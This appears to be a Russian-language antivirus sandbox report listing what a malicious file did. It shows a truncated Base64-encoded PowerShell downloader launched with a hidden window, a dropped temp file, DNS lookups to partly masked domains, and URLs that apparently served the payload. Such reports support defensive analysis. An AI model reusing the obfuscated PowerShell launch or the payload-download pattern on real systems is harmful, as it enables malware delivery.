Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\1231581.cvr
- 'be###gik.com':80
- 'yo###an.co.uk':80
- 'se######nailsfranklin.com':443
- http://be###gik.com/wp-includes/e6eT18030/
- http://yo###an.co.uk/hWftFfZpx/uRkkm0115/
- 'se######nailsfranklin.com':443
- DNS ASK ha####mnhat.mizi.vn
- DNS ASK be###gik.com
- DNS ASK ao###tunes.com
- DNS ASK yo###an.co.uk
- DNS ASK se######nailsfranklin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...' (со скрытым окном)